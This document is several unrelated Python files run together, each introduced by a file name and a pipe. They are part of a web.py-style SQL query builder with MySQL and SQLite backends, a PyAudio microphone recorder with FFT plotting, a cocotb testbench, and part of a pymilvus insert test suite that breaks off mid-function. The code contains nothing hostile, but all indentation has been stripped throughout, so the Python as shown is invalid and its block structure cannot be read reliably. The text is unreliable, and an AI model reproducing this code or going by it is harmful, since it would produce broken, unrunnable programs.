Selects `what` from `tables` with clauses `where`, `order`,
`group`, `limit`, and `offset`. Uses vars to interpolate.
Otherwise, each clause can be a SQLQuery.
>>> db = DB(None, {})
>>> db.select('foo', _test=True)
<sql: 'SELECT * FROM foo'>
>>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
<sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
"""
if vars is None:
vars = {}
sql_clauses = self.sql_clauses(
what, tables, where, group, order, limit, offset)
clauses = [self.gen_clause(sql, val, vars)
for sql, val in sql_clauses if val is not None]
qout = SQLQuery.join(clauses)
if _test:
return qout
return self.query(qout, processed=True)
def where(self, table, what='*', order=None, group=None, limit=None,
offset=None, _test=False, **kwargs):
"""
Selects from `table` where keys are equal to values in `kwargs`.
>>> db = DB(None, {})
>>> db.where('foo', bar_id=3, _test=True)
<sql: 'SELECT * FROM foo WHERE bar_id = 3'>
>>> db.where('foo', source=2, crust='dewey', _test=True)
<sql: "SELECT * FROM foo WHERE source = 2 AND crust = 'dewey'">
>>> db.where('foo', _test=True)
<sql: 'SELECT * FROM foo'>
"""
where_clauses = []
for k, v in kwargs.iteritems():
where_clauses.append(k + ' = ' + sqlquote(v))
if where_clauses:
where = SQLQuery.join(where_clauses, " AND ")
else:
where = None
return self.select(table, what=what, order=order,
group=group, limit=limit, offset=offset, _test=_test,
where=where)
def sql_clauses(self, what, tables, where, group, order, limit, offset):
return (
('SELECT', what),
('FROM', sqllist(tables)),
('WHERE', where),
('GROUP BY', group),
('ORDER BY', order),
('LIMIT', limit),
('OFFSET', offset))
def gen_clause(self, sql, val, vars):
if isinstance(val, (int, long)):
if sql == 'WHERE':
nout = 'id = ' + sqlquote(val)
else:
nout = SQLQuery(val)
#@@@
elif isinstance(val, (list, tuple)) and len(val) == 2:
nout = SQLQuery(val[0], val[1]) # backwards-compatibility
elif isinstance(val, SQLQuery):
nout = val
else:
nout = reparam(val, vars)
def xjoin(a, b):
if a and b:
return a + ' ' + b
else:
return a or b
return xjoin(sql, nout)
def insert(self, tablename, seqname=None, _test=False, **values):
"""
Inserts `values` into `tablename`. Returns current sequence ID.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
>>> q
<sql: "INSERT INTO foo (age, name, created) VALUES (2, 'bob', NOW())">
>>> q.query()
'INSERT INTO foo (age, name, created) VALUES (%s, %s, NOW())'
>>> q.values()
[2, 'bob']
"""
def q(x):
return "(" + x + ")"
if values:
_keys = SQLQuery.join(values.keys(), ', ')
_values = SQLQuery.join([sqlparam(v)
for v in values.values()], ', ')
sql_query = "INSERT INTO %s " % tablename + \
q(_keys) + ' VALUES ' + q(_values)
else:
sql_query = SQLQuery(
self._get_insert_default_values_query(tablename))
if _test:
return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(
sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s DEFAULT VALUES" % table
def multiple_insert(self, tablename, values, seqname=None, _test=False):
"""
Inserts multiple rows into `tablename`. The `values` must be a list of dictioanries,
one for each row to be inserted, each with the same set of keys.
Returns the list of ids of the inserted rows.
Set `seqname` to the ID if it's not the default, or to `False`
if there isn't one.
>>> db = DB(None, {})
>>> db.supports_multiple_insert = True
>>> values = [{"name": "foo", "email": "foo@example.com"}, {"name": "bar", "email": "bar@example.com"}]
>>> db.multiple_insert('person', values=values, _test=True)
<sql: "INSERT INTO person (name, email) VALUES ('foo', 'foo@example.com'), ('bar', 'bar@example.com')">
"""
if not values:
return []
if not self.supports_multiple_insert:
out = [self.insert(tablename, seqname=seqname, _test=_test, **v)
for v in values]
if seqname is False:
return None
else:
return out
keys = values[0].keys()
#@@ make sure all keys are valid
for v in values:
if v.keys() != keys:
raise ValueError('Not all rows have the same keys')
sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (
tablename, ', '.join(keys)))
for i, row in enumerate(values):
if i != 0:
sql_query.append(", ")
SQLQuery.join([SQLParam(row[k])
for k in keys], sep=", ", target=sql_query, prefix="(", suffix=")")
if _test:
return sql_query
db_cursor = self._db_cursor()
if seqname is not False:
sql_query = self._process_insert_query(
sql_query, tablename, seqname)
if isinstance(sql_query, tuple):
# for some databases, a separate query has to be made to find
# the id of the inserted row.
q1, q2 = sql_query
self._db_execute(db_cursor, q1)
self._db_execute(db_cursor, q2)
else:
self._db_execute(db_cursor, sql_query)
try:
out = db_cursor.fetchone()[0]
out = range(out-len(values)+1, out+1)
except Exception:
out = None
if not self.ctx.transactions:
self.ctx.commit()
return out
def update(self, tables, where, vars=None, _test=False, **values):
"""
Update `tables` with clause `where` (interpolated using `vars`)
and setting `values`.
>>> db = DB(None, {})
>>> name = 'Joseph'
>>> q = db.update('foo', where='name = $name', name='bob', age=2,
... created=SQLLiteral('NOW()'), vars=locals(), _test=True)
>>> q
<sql: "UPDATE foo SET age = 2, name = 'bob', created = NOW() WHERE name = 'Joseph'">
>>> q.query()
'UPDATE foo SET age = %s, name = %s, created = NOW() WHERE name = %s'
>>> q.values()
[2, 'bob', 'Joseph']
"""
if vars is None:
vars = {}
where = self._where(where, vars)
query = (
"UPDATE " + sqllist(tables) +
" SET " + sqlwhere(values, ', ') +
" WHERE " + where)
if _test:
return query
db_cursor = self._db_cursor()
self._db_execute(db_cursor, query)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def delete(self, table, where, using=None, vars=None, _test=False):
"""
Deletes from `table` with clauses `where` and `using`.
>>> db = DB(None, {})
>>> name = 'Joe'
>>> db.delete('foo', where='name = $name', vars=locals(), _test=True)
<sql: "DELETE FROM foo WHERE name = 'Joe'">
"""
if vars is None:
vars = {}
where = self._where(where, vars)
q = 'DELETE FROM ' + table
if using:
q += ' USING ' + sqllist(using)
if where:
q += ' WHERE ' + where
if _test:
return q
db_cursor = self._db_cursor()
self._db_execute(db_cursor, q)
if not self.ctx.transactions:
self.ctx.commit()
return db_cursor.rowcount
def _process_insert_query(self, query, tablename, seqname):
return query
def transaction(self):
"""Start a transaction."""
return Transaction(self.ctx)
class MySQLDB(DB):
def __init__(self, **keywords):
import MySQLdb as db
if 'pw' in keywords:
keywords['passwd'] = keywords['pw']
del keywords['pw']
if 'charset' not in keywords:
keywords['charset'] = 'utf8'
elif keywords['charset'] is None:
del keywords['charset']
self.paramstyle = db.paramstyle = 'pyformat' # it's both, like psycopg
self.dbname = "mysql"
DB.__init__(self, db, keywords)
self.supports_multiple_insert = True
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_id();')
def _get_insert_default_values_query(self, table):
return "INSERT INTO %s () VALUES()" % table
def import_driver(drivers, preferred=None):
"""Import the first available driver or preferred driver.
"""
if preferred:
drivers = [preferred]
for d in drivers:
try:
return __import__(d, None, None, ['x'])
except ImportError:
pass
raise ImportError("Unable to import " + " or ".join(drivers))
class SqliteDB(DB):
def __init__(self, **keywords):
db = import_driver(["sqlite3", "pysqlite2.dbapi2",
"sqlite"], preferred=keywords.pop('driver', None))
if db.__name__ in ["sqlite3", "pysqlite2.dbapi2"]:
db.paramstyle = 'qmark'
# sqlite driver doesn't create datatime objects for timestamp columns unless `detect_types` option is passed.
# It seems to be supported in sqlite3 and pysqlite2 drivers, not surte
# about sqlite.
keywords.setdefault('detect_types', db.PARSE_DECLTYPES)
self.paramstyle = db.paramstyle
keywords['database'] = keywords.pop('db')
keywords[
'pooling'] = False # sqlite don't allows connections to be shared by threads
self.dbname = "sqlite"
DB.__init__(self, db, keywords)
def _process_insert_query(self, query, tablename, seqname):
return query, SQLQuery('SELECT last_insert_rowid();')
def query(self, *a, **kw):
out = DB.query(self, *a, **kw)
if isinstance(out, iterbetter):
del out.__len__
return out
def dburl2dict(url):
"""
Takes a URL to a database and parses it into an equivalent dictionary.
>>> dburl2dict('postgres://james:day@serverfarm.example.net:5432/mygreatdb')
{'pw': 'day', 'dbn': 'postgres', 'db': 'mygreatdb', 'host': 'serverfarm.example.net', 'user': 'james', 'port': '5432'}
>>> dburl2dict('postgres://james:day@serverfarm.example.net/mygreatdb')
{'user': 'james', 'host': 'serverfarm.example.net', 'db': 'mygreatdb', 'pw': 'day', 'dbn': 'postgres'}
>>> dburl2dict('postgres://james:d%40y@serverfarm.example.net/mygreatdb')
{'user': 'james', 'host': 'serverfarm.example.net', 'db': 'mygreatdb', 'pw': 'd@y', 'dbn': 'postgres'}
"""
dbn, rest = url.split('://', 1)
user, rest = rest.split(':', 1)
pw, rest = rest.split('@', 1)
if ':' in rest:
host, rest = rest.split(':', 1)
port, rest = rest.split('/', 1)
else:
host, rest = rest.split('/', 1)
port = None
db = rest
uq = urllib.unquote
out = dict(dbn=dbn, user=uq(user), pw=uq(pw), host=uq(host), db=uq(db))
if port:
out['port'] = port
return out
_databases = {}
def database(dburl=None, **params):
"""Creates appropriate database using params.
Pooling will be enabled if DBUtils module is available.
Pooling can be disabled by passing pooling=False in params.
"""
if not dburl and not params:
dburl = os.environ['DATABASE_URL']
if dburl:
params = dburl2dict(dburl)
dbn = params.pop('dbn')
if dbn in _databases:
return _databases[dbn](**params)
else:
raise UnknownDB(dbn)
def register_database(name, clazz):
"""
Register a database.
>>> class LegacyDB(DB):
... def __init__(self, **params):
... pass
...
>>> register_database('legacy', LegacyDB)
>>> db = database(dbn='legacy', db='test', user='joe', passwd='secret')
"""
_databases[name] = clazz
register_database('mysql', MySQLDB)
register_database('sqlite', SqliteDB)
def _interpolate(format):
"""
Takes a format string and returns a list of 2-tuples of the form
(boolean, string) where boolean says whether string should be evaled
or not.
from <http://lfw.org/python/Itpl.py> (public domain, Ka-Ping Yee)
"""
from tokenize import tokenprog
def matchorfail(text, pos):
match = tokenprog.match(text, pos)
if match is None:
raise _ItplError(text, pos)
return match, match.end()
namechars = "abcdefghijklmnopqrstuvwxyz"\
"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
chunks = []
pos = 0
while True:
dollar = format.find("$", pos)
if dollar < 0:
break
nextchar = format[dollar + 1]
if nextchar == "{":
chunks.append((0, format[pos:dollar]))
pos, level = dollar + 2, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token == "{":
level = level + 1
elif token == "}":
level = level - 1
chunks.append((1, format[dollar + 2:pos - 1]))
elif nextchar in namechars:
chunks.append((0, format[pos:dollar]))
match, pos = matchorfail(format, dollar + 1)
while pos < len(format):
if format[pos] == "." and\
pos + 1 < len(format) and format[pos + 1] in namechars:
match, pos = matchorfail(format, pos + 1)
elif format[pos] in "([":
pos, level = pos + 1, 1
while level:
match, pos = matchorfail(format, pos)
tstart, tend = match.regs[3]
token = format[tstart:tend]
if token[0] in "([":
level = level + 1
elif token[0] in ")]":
level = level - 1
else:
break
chunks.append((1, format[dollar + 1:pos]))
else:
chunks.append((0, format[pos:dollar + 1]))
pos = dollar + 1 + (nextchar == "$")
if pos < len(format):
chunks.append((0, format[pos:]))
return chunks
if __name__ == "__main__":
import doctest
doctest.testmod()
|
recorder.py | import matplotlib
matplotlib.use('TkAgg') # <-- THIS MAKES IT FAST!
import numpy
import scipy
import struct
import pyaudio
import threading
import pylab
import struct
class SwhRecorder:
"""Simple, cross-platform class to record from the microphone."""
def __init__(self):
"""minimal garb is executed when class is loaded."""
self.RATE=48100
self.BUFFERSIZE=2**12 #1024 is a good buffer size
self.secToRecord=.1
self.threadsDieNow=False
self.newAudio=False
def setup(self):
"""initialize sound card."""
#TODO - windows detection vs. alsa or something for linux
#TODO - try/except for sound card selection/initiation
self.buffersToRecord=int(self.RATE*self.secToRecord/self.BUFFERSIZE)
if self.buffersToRecord==0: self.buffersToRecord=1
self.samplesToRecord=int(self.BUFFERSIZE*self.buffersToRecord)
self.chunksToRecord=int(self.samplesToRecord/self.BUFFERSIZE)
self.secPerPoint=1.0/self.RATE
self.p = pyaudio.PyAudio()
self.inStream = self.p.open(format=pyaudio.paInt16,channels=1,rate=self.RATE,input=True,frames_per_buffer=self.BUFFERSIZE)
self.xsBuffer=numpy.arange(self.BUFFERSIZE)*self.secPerPoint
self.xs=numpy.arange(self.chunksToRecord*self.BUFFERSIZE)*self.secPerPoint
self.audio=numpy.empty((self.chunksToRecord*self.BUFFERSIZE),dtype=numpy.int16)
def close(self):
"""cleanly back out and release sound card."""
self.p.close(self.inStream)
### RECORDING AUDIO ###
def getAudio(self):
"""get a single buffer size worth of audio."""
audioString=self.inStream.read(self.BUFFERSIZE)
return numpy.fromstring(audioString,dtype=numpy.int16)
def record(self,forever=True):
"""record secToRecord seconds of audio."""
while True:
if self.threadsDieNow: break
for i in range(self.chunksToRecord):
self.audio[i*self.BUFFERSIZE:(i+1)*self.BUFFERSIZE]=self.getAudio()
self.newAudio=True
if forever==False: break
def continuousStart(self):
"""CALL THIS to start running forever."""
self.t = threading.Thread(target=self.record)
self.t.start()
def continuousEnd(self):
"""shut down continuous recording."""
self.threadsDieNow=True
### MATH ###
def downsample(self,data,mult):
"""Given 1D data, return the binned average."""
overhang=len(data)%mult
if overhang: data=data[:-overhang]
data=numpy.reshape(data,(len(data)/mult,mult))
data=numpy.average(data,1)
return data
def fft(self,data=None,trimBy=10,logScale=False,divBy=100):
if data==None:
data=self.audio.flatten()
left,right=numpy.split(numpy.abs(numpy.fft.fft(data)),2)
ys=numpy.add(left,right[::-1])
if logScale:
ys=numpy.multiply(20,numpy.log10(ys))
xs=numpy.arange(self.BUFFERSIZE/2,dtype=float)
if trimBy:
i=int((self.BUFFERSIZE/2)/trimBy)
ys=ys[:i]
xs=xs[:i]*self.RATE/self.BUFFERSIZE
if divBy:
ys=ys/float(divBy)
return xs,ys
### VISUALIZATION ###
def plotAudio(self):
"""open a matplotlib popup window showing audio data."""
pylab.plot(self.audio.flatten())
pylab.show()
|
dut_cocotb.py | import cocotb
import test_sw
from cocotb.clock import Clock
from cocotb.triggers import RisingEdge, FallingEdge
from queue import Queue, Empty
import tester
import threading
class CocoTBBFM():
def __init__(self, dut):
self.dut = dut
self.queue = Queue(maxsize=1)
print(f"made queue {self.queue}")
self.done = cocotb.triggers.Event(name="Done")
def send_num(self, num):
print(f"in: {num} to {self.queue}")
self.queue.put(num)
async def start(self):
while True:
await RisingEdge(self.dut.clk)
try:
print(f"trying to get from {self.queue}")
numb = await self.queue.get()
print(f"got: {numb}")
self.dut.data_in = numb
except Empty:
print("not_there")
pass
async def reset(self):
await FallingEdge(self.dut.clk)
self.dut.reset_n = 0
await FallingEdge(self.dut.clk)
self.dut.reset_n = 1
await RisingEdge(self.dut.clk)
def done(self):
self.done.set()
def run_test(test):
tester.Tester.run_test(test)
@cocotb.test()
async def test_alu(dut):
clock = Clock(dut.clk, 2, units="us")
cocotb.fork(clock.start())
bfm = CocoTBBFM(dut)
stim = test_sw.Stim(5,dut, bfm)
await bfm.reset()
cocotb.fork(bfm.start())
tt = threading.Thread(target=run_test, args=(stim.numb_gen_test,), name="Run Thread")
tt.start()
await bfm.done.wait()
|
test_insert.py | import copy
import logging
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
default_single_query = {
"data": ut.gen_vectors(1, ut.default_dim),
"anns_field": ut.default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": 10,
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
if request.param["index_type"] in ut.index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
logging.getLogger().info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_None(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = ut.default_segment_row_limit + 1
result = connect.insert(collection, ut.gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and
the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and
the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
logging.getLogger().info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
